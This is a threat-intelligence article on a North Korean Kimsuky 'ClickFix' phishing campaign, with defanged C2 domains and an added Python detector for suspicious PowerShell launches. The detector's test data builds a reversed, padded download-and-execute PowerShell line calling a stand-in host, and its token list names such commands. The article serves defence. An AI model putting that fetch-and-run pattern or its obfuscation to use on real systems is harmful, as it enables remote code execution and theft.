Cybersecurity researchers at the Genians Security Center (GSC) identified a sophisticated campaign attributed to the North Korean APT group Kimsuky, leveraging the so-called “ClickFix” tactic to compromise target systems.
ClickFix, first documented by Proofpoint in April 2024, exploits user psychology by presenting seemingly legitimate troubleshooting instructions or security verification prompts, ultimately coercing victims into executing malicious PowerShell or script commands on their own devices.
Evolution of the ClickFix Tactic
The ClickFix method is a form of social engineering that disguises malicious intent behind plausible instructions, such as fixing browser errors or entering authentication codes.

Originally, it involved fake error messages on compromised websites, prompting users to copy and paste code into PowerShell.
Recent iterations have expanded to multilingual phishing emails, fake job portals, and even mimicked security interfaces of popular Korean web portals.
In each scenario, the user is manipulated into executing a pre-crafted command, typically obfuscated to evade detection and hinder reverse-engineering analysis.
For instance, in a January 2025 spear-phishing attack, Kimsuky operatives impersonated a European journalist to lure a South Korean expert into opening a malicious Visual Basic Script (.vbs) file.

The script, delivered via an encrypted archive, executed a multi-stage payload: launching a decoy document, creating hidden directories, downloading further malware from a command-and-control (C2) server, and establishing persistence through scheduled tasks.
Obfuscation techniques, such as inserting random numeric strings and using reverse string transformations, were employed to bypass signature-based detection.
By March 2025, the group had shifted to a more refined ClickFix approach. Targets received phishing emails purportedly from aides to senior U.S. officials, containing multilingual manuals and code snippets.
According to the Genians Security Center (GSC) report, victims were instructed to paste obfuscated PowerShell commands, often written in reverse order, into their consoles.
These commands, once executed, would contact C2 infrastructure, download additional payloads, and exfiltrate sensitive information.
Infrastructure and Attribution
Kimsuky’s infrastructure is characterized by a rotating set of C2 domains, often leveraging compromised or newly registered domains with plausible names.
Notable C2 addresses include konamo[.]xyz, raedom[.]store, kida.plusdocs.kro[.]kr, and others, spanning hosting providers in South Korea, the U.S., Japan, and beyond.
The threat group also utilizes cloud storage services (e.g., Google Drive, Proton Drive) for payload delivery and decoy content.
Linguistic analysis of phishing lures and web interfaces further supports attribution to North Korea, with the use of distinctive vocabulary and IT terminology consistent with North Korean dialects.
Additionally, the campaign’s technical indicators, such as the repeated use of the string “7539518426” for obfuscation and the deployment of RATs like QuasarRAT, align with known Kimsuky TTPs, particularly those observed in the ongoing “BabyShark” campaign.
The ClickFix tactic underscores the necessity of robust endpoint detection and response (EDR) solutions capable of behavioral analysis and real-time threat visibility.
Unlike traditional malware, ClickFix relies on user execution, making it less susceptible to conventional signature-based defenses.
EDR platforms, such as Genian EDR, can track process chains initiated by PowerShell, identify abnormal behaviors, and provide actionable intelligence for SOC teams.
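As an added example (not code from the article, from Genians, or from any EDR product), the following triage heuristic runs over constructed Sysmon-style process-creation events and combines three observations from this campaign: the reused filler string “7539518426”, command text supplied in reverse order, and PowerShell being launched by the user's own shell. The event field names, token list, threshold and the `c2.example.invalid` hostname are assumptions.

```python
FILLER = "7539518426"  # filler string the article says Kimsuky reuses for obfuscation

# Lowercase substrings typical of download-and-execute PowerShell one-liners.
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "invoke-webrequest",
    "frombase64string", "-enc", "hidden", "new-object net.webclient", "schtasks",
)

def normalise(cmdline):
    """Return (forward, reversed) lowercase forms with the filler string removed."""
    stripped = cmdline.replace(FILLER, "")
    return stripped.lower(), stripped[::-1].lower()

def score(event):
    """Return the list of heuristic hits for one process-creation event."""
    hits = []
    forward, backward = normalise(event["cmdline"])
    for form, label in ((forward, "forward"), (backward, "reversed")):
        hits += [f"{label}:{tok}" for tok in SUSPICIOUS_TOKENS if tok in form]
    if FILLER in event["cmdline"]:
        hits.append("filler-string")
    # ClickFix depends on the user running the command, so PowerShell is spawned
    # by the desktop shell (explorer.exe) rather than by a script host or service.
    if (event["image"].lower().endswith("powershell.exe")
            and event["parent"].lower().endswith("explorer.exe")):
        hits.append("powershell-from-explorer")
    return hits

def flagged(events, threshold=2):
    """Indices of events whose hit count reaches the (tunable) threshold."""
    return [i for i, ev in enumerate(events) if len(score(ev)) >= threshold]

# Constructed Sysmon-style events (not from the report). The third mimics a
# ClickFix paste: a reversed download-and-run one-liner padded with the filler.
_payload = "iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
_obfuscated = _payload[::-1][:12] + FILLER + _payload[::-1][12:]
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "' + _obfuscated + '"'},
]

if __name__ == "__main__":
    for i in flagged(EVENTS):
        print(i, score(EVENTS[i]))
```

Only the third event is flagged; the benign notepad launch and the scripted backup job produce no hits, which is the point of scoring several weak signals together rather than alerting on any one of them.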
Security awareness training remains crucial, as the attack hinges on social engineering. Users should be wary of unsolicited instructions to execute scripts or commands, especially those requiring administrative privileges.
Organizations are encouraged to update firewall blocklists with the latest IoCs and leverage threat intelligence to pivot and correlate related activity.
Indicators of Compromise (IoC)